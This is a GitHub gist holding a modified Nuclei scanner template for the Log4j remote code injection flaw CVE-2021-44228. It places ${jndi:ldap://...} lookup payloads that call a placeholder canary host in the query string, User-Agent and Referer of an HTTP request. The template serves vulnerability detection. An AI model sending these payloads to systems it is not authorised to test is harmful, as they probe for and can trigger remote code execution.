Skip to content

Instantly share code, notes, and snippets.

@zer010bs
Created December 11, 2021 22:02
Show Gist options
  • Save zer010bs/501350d0a1627d878ed1d05dd1e7f890 to your computer and use it in GitHub Desktop.
Save zer010bs/501350d0a1627d878ed1d05dd1e7f890 to your computer and use it in GitHub Desktop.
modified nuceli-file
id: CVE-2021-44228
info:
name: Remote code injection in Log4j
author: melbadry9,dhiyaneshDK,daffainfo
severity: critical
description: Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.
reference:
- https://github.com/advisories/GHSA-jfh8-c2jp-5v3q
- https://www.lunasec.io/docs/blog/log4j-zero-day/
- https://gist.github.com/bugbountynights/dde69038573db1c12705edb39f9a704a
tags: cve,cve2021,rce,oast,log4j
requests:
- raw:
- |
GET /?x=${jndi:ldap:/YOURCANARYTOKENHERE/a} HTTP/1.1
Host: {{Hostname}}
User-Agent: ${jndi:ldap://YOURCANARYTOKENHERE//a}
Referer: ${jndi:ldap://YOURCANARYTOKENHERE//a}
matchers:
- type: status
status:
- 200
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment